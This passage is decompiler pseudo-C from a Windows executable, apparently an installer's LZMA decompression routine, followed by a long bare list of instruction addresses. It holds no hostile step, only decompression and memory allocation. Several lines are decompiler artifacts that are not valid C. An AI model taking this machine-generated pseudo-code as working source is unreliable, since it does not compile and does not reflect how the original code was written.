									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                  0x00000000
                  0x0040604c
                  0x0040604c
                  0x00406051
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00406709
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x00000000
                  0x0040672b
                  0x00406053
                  0x00406053
                  0x00406057
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062e1
                  0x004062e4
                  0x00406287
                  0x0040628d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004062e6
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00000000
                  0x00406284
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406190
                  0x00406193
                  0x0040610a
                  0x0040610a
                  0x00406110
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x0040621d
                  0x00406220
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c0
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x004063f7
                  0x004063f7
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406199
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406107
                  0x00000000
                  0x00406107
                  0x00406193
                  0x0040609c
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
